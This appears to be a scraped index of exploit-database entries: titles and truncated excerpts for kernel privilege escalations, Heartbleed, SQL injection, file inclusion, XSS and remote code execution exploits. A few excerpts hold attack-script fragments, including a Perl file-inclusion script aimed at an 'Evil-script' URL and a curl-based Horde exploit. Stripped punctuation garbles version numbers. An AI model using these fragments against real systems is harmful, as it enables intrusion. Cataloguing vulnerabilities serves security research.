Linux Kernel 4.4.0-21 4.4.0-51 (Ubuntu 14.0416.04 x86-64) - AF_PACKET Race Condition Privilege Escalation

Linux Kernel 4.4.0-21 4.4.0-51 Ubuntu 14.0416.04 x86-64 - AFPACKET Race Condition Privilege Escalation / chocoboroot.c linux AFPACKET race condition exploit for CVE-2016-8655. Includes KASLR and SMEP/SMAP bypasses. For Ubuntu 14.04 / 16.04 x8664 kernels 4.4.0 before 4.4.0-53.74. All kernel offset...

Exim ESMTP 4.80 - glibc gethostbyname Denial of Service

Exim ESMTP 4.80 - glibc gethostbyname Denial of Service Exploit Title: Exim ESMTP GHOST DoS PoC Exploit Date: 1/29/2015 Exploit Author: 1N3 Vendor Homepage: www.exim.org Version: 4.80 or less Tested on: debian-7-7-64b CVE : 2015-0235 !/usr/bin/python Exim ESMTP DoS Exploit by 1N3 v20150128...

OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (2) (DTLS Support)

OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak 2 DTLS Support / CVE-2014-0160 heartbleed OpenSSL information leak exploit ========================================================= This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leake...

Link ADS 1 - linkid SQL Injection

Link ADS 1 - linkid SQL Injection Link ADS 1 SQL Injection Vulnerability ======================================================== Author: Hussin X Home : www.tryag.cc/cc email: darkangelg85atYahooDoTcom hussin.xathotmailDoTcom ======================================================== HomE script :...

YABB SE 0.81.41.5 - Packages.php Remote File Inclusion

YABB SE 0.81.41.5 - Packages.php Remote File Inclusion source: https://www.securityfocus.com/bid/6663/info YaBB SE allows remote users to influence the location of included files. A remote attacker may exploit this condition to cause an external, attacker-supplied file to be included and executed...

Sysaid 20.1.11 b26 - Remote Command Execution

Sysaid 20.1.11 b26 - Remote Command Execution Exploit Title: Sysaid 20.1.11 b26 - Remote Command Execution Google Dork: intext:"Help Desk Software by SysAid " Date: 2020-03-09 Exploit Author: Ahmed Sherif Vendor Homepage: https://www.sysaid.com/free-help-desk-software Software Link:...

Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation

Linux Kernel 4.8.0-41-generic Ubuntu - Packet Socket Local Privilege Escalation // A proof-of-concept local root exploit for CVE-2017-7308. // Includes a SMEP & SMAP bypass. // Tested on 4.8.0-41-generic Ubuntu kernel. // https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308 // //...

RomPager 4.34 (Multiple Router Vendors) - Misfortune Cookie Authentication Bypass

RomPager 4.34 Multiple Router Vendors - Misfortune Cookie Authentication Bypass Title: Misfortune Cookie Exploit RomPager = 4.34 router authentication remover Date: 17/4/2016 CVE: CVE-2015-9222 http://mis.fortunecook.ie Vendors: ZyXEL,TP-Link,D-Link,Nilox,Billion,ZTE,AirLive,... Vulnerable models...

OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (1)

OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak 1 / CVE-2014-0160 heartbleed OpenSSL information leak exploit ========================================================= This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leaked information...

PHPhotoalbum - Arbitrary File Upload

PHPhotoalbum - Arbitrary File Upload || || | || o,7 || . o7 || 4||| ow, : / / . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ team wlhaan hacker | | // | | |...

Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)

Rejetto HTTP File Server HFS 2.3.x - Remote Command Execution 1 Exploit Title: HttpFileServer 2.3.x Remote Command Execution Google Dork: intext:"httpfileserver 2.3" Date: 11-09-2014 Remote: Yes Exploit Author: Daniele Linguaglossa Vendor Homepage: http://rejetto.com/ Software Link:...

ElasticSearch - Remote Code Execution

ElasticSearch - Remote Code Execution body padding-top: 50px; .starter-template padding: 40px 15px; text-align: center; function esinject var readfile; var writefile; readfile = functionfilename return "import java.util.;\nimport java.io.;\nnew Scannernew File"" + filename +...

Open Realty 2.x3.x - Persistent Cross-Site Scripting

Open Realty 2.x3.x - Persistent Cross-Site Scripting Title: persistence XSS flaw in Open Realty 2.x and 3.x Author: K053 Date: 2010-7-24 Hompage: http://open-realty.org Download Link: http://www.open-realty.org/download.html Version: 3.x & 2.x...

Pasworld - detail.php Blind SQL Injection

Pasworld - detail.php Blind SQL Injection ========================================================= + Title :- Pasworld detail.php Blind Sql Injection Vulnerability + Date :- 5 - June - 2015 + Vendor Homepage: :- http://main.pasworld.co.th/ + Version :- All Versions + Tested on :- Nginx/1.4.5,...

Nginx 0.6.36 - Directory Traversal

Nginx 0.6.36 - Directory Traversal Exploit Title: nginx engine x http server = 0.6.36 Path Draversal Date: 20/05/10 Author: cp77fk4r | empty0pageSHIFT+2gmail.com | www.DigitalWhisper.co.il Software Link: http://nginx.org/ Version: = 0.6.36 Tested on: Win32 Path Traversal: A Path Traversal attack...

DUware DUpaypal 3.03.1 - detail.asp?iPro SQL Injection

DUware DUpaypal 3.03.1 - detail.asp?iPro SQL Injection source: https://www.securityfocus.com/bid/14034/info DUpaypal Pro is prone to multiple SQL-injection vulnerabilities because the fails application to properly sanitize user-supplied input before using it in SQL queries. A successful exploit...

SpyHunter 4 - SpyHunter 4 Service Unquoted Service Path

SpyHunter 4 - SpyHunter 4 Service Unquoted Service Path Exploit Title: SpyHunter 4 - 'SpyHunter 4 Service' Unquoted Service Path Discovery by: Alejandro Reyes Discovery Date: 2020-03-05 Vendor Homepage: https://www.enigmasoftware.com Software Link :...

OpenSMTPD 6.6.3p1 - Local Privilege Escalation + Remote Code Execution

OpenSMTPD 6.6.3p1 - Local Privilege Escalation + Remote Code Execution / LPE and RCE in OpenSMTPD's default install CVE-2020-8794 Copyright C 2020 Qualys, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by...

Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream

Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- 2040.5034: Access violation - code c0000005 first...

Lua 5.3.5 - debug.upvaluejoin Use After Free

Lua 5.3.5 - debug.upvaluejoin Use After Free Exploit Title: Lua 5.3.5 Exploit Author: Fady Mohamed Osman https://twitter.com/fadyothman Exploit-db : http://www.exploit-db.com/author/?a=2986 Blog : https://blog.fadyothman.com/ Date: Jan. 10th 2019 Vendor Homepage: https://www.lua.org/ Software Lin...

Advanced Comment System 1.0 - SQL Injection

Advanced Comment System 1.0 - SQL Injection Exploit Title: SQL injection in Advanced comment system v1.0 Date: 29-10-2018 Exploit Author: Rafael Pedrero Vendor Homepage: http://www.plohni.com Software Link: http://www.plohni.com/wb/content/php/download/Advancedcommentsystem1-0.zip,...

Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation

Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation I have previously disclosed a couple of bugs in Hashicorp's vagrant-vmware-fusion plugin for vagrant. Unfortunately the 4.0.23 release which was supposed to fix the previous bug I reported didn't address the issue, so Hashicorp...

Microsoft Windows - .LNK Shortcut File Code Execution (Metasploit)

Microsoft Windows - .LNK Shortcut File Code Execution Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LNK Remote Code Execution Vulnerability', 'Description' = %q This module exploits...

WebDM CMS - SQL Injection

WebDM CMS - SQL Injection WebDM CMS SQL Injection Vulnerability EDB-ID: CVE: OSVDB-ID: Author: Dr.0rYX and Cr3w-DZ Published: Verified: Exploit Code: Vulnerable App: . . \ \ /| | \ /|| / / /\ \ | | | | \ \ \ | \ \ |/ \ \ | | \ / \ | /| | | Y \ // / | \ | | / \ \ / \ || /\ /| || || / /\ / ||...

AtomixMP3 2.3 - .m3u Local Buffer Overflow

AtomixMP3 2.3 - .m3u Local Buffer Overflow / ======================================================================== 0-day AtomixMP3 November 2006 - Month Of Greg's Media Player Exploits : i'll probably continue it into December Discovered and Reported By: Greg Linares [email protected]...

snapd 2.37 (Ubuntu) - dirty_sock Local Privilege Escalation (2)

snapd 2.37 Ubuntu - dirtysock Local Privilege Escalation 2 !/usr/bin/env python3 """ dirtysock: Privilege Escalation in Ubuntu via snapd In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository...

Joomla! 1.5 3.4.5 - Object Injection x-forwarded-for Header Remote Code Execution

Joomla! 1.5 3.4.5 - Object Injection x-forwarded-for Header Remote Code Execution !/usr/bin/env python Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header Date: 12/17/2015 Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs @0xcclabs...

Simple-HTTPD

Remote root on sfr/ubiquisys femtocell webserver wsal/shttpd/mongoose ToDo: Add execute shell ToDo: Test vulnerable targets Modified by JSacco - [email protected] part of femtocell research by TU-Berlin only for educational purposes Exploit Title: remote root on sfr/ubiquisys femtocell...

PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload

PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload date"U"-300 43. 44. fnc"laneMakeToken", "file", $GET"id", array 45. "user.username" = me"username", 46. "file" = "system/cache/temp/".$filename, 47. ; 48. PHPizabi is prone to a vulnerability that lets remote attackers to upload and execute...

Pivot 1.0 - module_db.php Remote File Inclusion

Pivot 1.0 - moduledb.php Remote File Inclusion source: https://www.securityfocus.com/bid/10553/info It has been reported that Pivot is affected by a remote file include vulnerability contained within the moduledb.php script. This issue is due to a failure of the application to properly sanitize...

Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)

Exagate Sysguard 6001 - Cross-Site Request Forgery Add Admin Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery Add Admin Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.exagate.com/ Software Link: https://www.exagate.com/sysguard-6001 Version: SYSGuard 6001 HTML...

WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure

WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure Author: RedTeam Pentesting GmbH Date: 2020-03-11 Vendor: https://www.watchguard.com Software link:...

ASUS GiftBox Desktop 1.1.1.127 - ASUSGiftBoxDesktop Unquoted Service Path

ASUS GiftBox Desktop 1.1.1.127 - ASUSGiftBoxDesktop Unquoted Service Path Exploit Title: ASUS GiftBox Desktop 1.1.1.127 - 'ASUSGiftBoxDesktop' Unquoted Service Path Discovery by: Oscar Flores Discovery Date: 2020-03-05 Vendor Homepage: https://www.asus.com/ Software Link :...

Apache Tomcat 5.5.0 5.5.29 6.0.0 6.0.26 - Information Disclosure

Apache Tomcat 5.5.0 5.5.29 6.0.0 6.0.26 - Information Disclosure CVE-2010-1157: Apache Tomcat information disclosure vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 6.0.0 to 6.0.26 - - Tomcat 5.5.0 to 5.5.29 Note: The unsupported Tomcat 3.x, 4.x an...

Cisco Adaptive Security Appliance - Path Traversal (Metasploit)

Cisco Adaptive Security Appliance - Path Traversal Metasploit require 'msf/core' class MetasploitModule "Cisco Adaptive Security Appliance - Path Traversal", 'Description' = %q Cisco Adaptive Security Appliance - Path Traversal CVE-2018-0296 A security vulnerability in Cisco ASA that would allow ...

Linux Kernel 3.4 3.13.2 (Ubuntu 13.0413.10 x64) - CONFIG_X86_X32y Local Privilege Escalation (3)

Linux Kernel 3.4 3.13.2 Ubuntu 13.0413.10 x64 - CONFIGX86X32y Local Privilege Escalation 3 / ============================== recvmmsg.c - linux 3.4+ local root CONFIGX86X32=y CVE-2014-0038 / x32 ABI with recvmmsg by rebel @ irc.smashthestack.org ----------------------------------- takes about 13...

Dolphin 7.0.3 - Multiple Vulnerabilities

Dolphin 7.0.3 - Multiple Vulnerabilities Exploit Title: Dolphin Mullti Vulnerability Date : 29-10-2010 Author : anT!-Tr0J4n Version : 7.0.3 DorK : Powered by Dolphin Greetz : Dev-PoinT.com inj3ct0r.com All Dev-poinT members and my friends Home : www.Dev-PoinT.com : http://inj3ct0r.com Email :...

Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections

Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections -+================================================================================+- -+ AlstraSoft AskMe Pro = 2.1 SQL Injection Vulnerabilitys +- -+================================================================================+- Discovered By:...

VP-ASP 6.00 - shopcurrency.asp SQL Injection

VP-ASP 6.00 - shopcurrency.asp SQL Injection VP-ASP 6.00 SQL Injection / Exploit by [email protected] people claimed there is some underground sploit for vp-asp 6.00 and I was sure that if a sploit really exist in the ug i can find the bug and make a small hack for it ^^ well it didn't...

RICOH Aficio SP 5200S Printer - entryNameIn HTML Injection

RICOH Aficio SP 5200S Printer - entryNameIn HTML Injection Exploit Title: RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection Discovery by: Paulina Girón Discovery Date: 2020-03-02 Vendor Homepage: https://www.ricoh.com/ Hardware Link:...

Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection

Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection Issue: Out-of-Band XXE in Universal Media Server's SSDP Processing Reserved CVE: CVE-2018-13416 Vulnerability Overview The XML parsing engine for Universal Media Server's SSDP/UPNP functionality is vulnerable to an XML...

Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Local Privilege Escalation

Linux Kernel 4.6.2 Ubuntu 16.04.1 - IP6TSOSETREPLACE Local Privilege Escalation Exploit Title: Linux kernel = 4.6.2 - Local Privileges Escalation via IP6TSOSETREPLACE compat setsockopt call Date: 2016.10.8 Exploit Author: Qian Zhang@MarvelTeam Qihoo 360 Version: Linux kernel = 4.6.2 Tested on:...

PHP 5.2.6 - create_function() Code Injection (1)

PHP 5.2.6 - createfunction Code Injection 1 source: https://www.securityfocus.com/bid/31398/info PHP is prone to a code-injection weakness because it fails to sufficiently sanitize input to 'createfunction'. Note that the anonymous function returned need not be called for the supplied code to be...

PHPRaid 3.0.7 - rss.php?PHPraid_dir Remote File Inclusion

PHPRaid 3.0.7 - rss.php?PHPraiddir Remote File Inclusion !/usr/bin/perl phpraid cmd shell example: Exploit : http://www.example.com/phpRaidpath/rss.php?phpraiddir=Evil-script? use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// || $Pathtocmd!/http:/// ||...

MetaCart E-Shop V-8 - IntProdID SQL Injection

MetaCart E-Shop V-8 - IntProdID SQL Injection source: https://www.securityfocus.com/bid/13376/info An SQL injection vulnerability affects MetaCart e-Shop V-8. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. An attack...

NetBackup 7.0 - NetBackup INET Daemon Unquoted Service Path

NetBackup 7.0 - NetBackup INET Daemon Unquoted Service Path Exploit Title: NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path Discovery by: Alan Mondragon "El Masas" Discovery Date: 2020-03-17 Vendor Homepage: https://www.veritas.com/ Software Link : https://www.veritas.com/ Veritas...

Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution

Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution !/bin/sh if "$" -ne 4 ; then echo '! Usage: ' 1&2 exit 1 fi BASE="$1" USERNAME="$2" PASSWORD="$3" COMMAND="$4" JAR="$mktemp" trap 'rm -f "$JAR"' EXIT echo "+ Logging in as $USERNAME:$PASSWORD" 1&2 curl -si -c "$JAR" "$BASE/login.php" ...

Cisco Data Center Network Manager 11.2.1 - LanFabricImpl Command Injection

Cisco Data Center Network Manager 11.2.1 - LanFabricImpl Command Injection !/usr/bin/python """ Cisco Data Center Network Manager LanFabricImpl createLanFabric Command Injection Remote Code Execution Vulnerability Tested on: Cisco DCNM 11.2.1 ISO Virtual Appliance for VMWare, KVM and Bare-metal...

Liferay Portal 7.1 CE GA3 SimpleCaptcha API - Cross-Site Scripting

Liferay Portal 7.1 CE GA3 SimpleCaptcha API - Cross-Site Scripting Exploit Title: Liferay Portal ” / or ” /. A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability. Poc In a sample scenario of custom code...

Microsoft Windows - Win32k Local Privilege Escalation

Microsoft Windows - Win32k Local Privilege Escalation CVE-2019-0803 Win32k Elevation of Privilege Poc Reference ----------------------------- steal Security token https://github.com/mwrlabs/CVE-2016-7255 EDB Note: Download...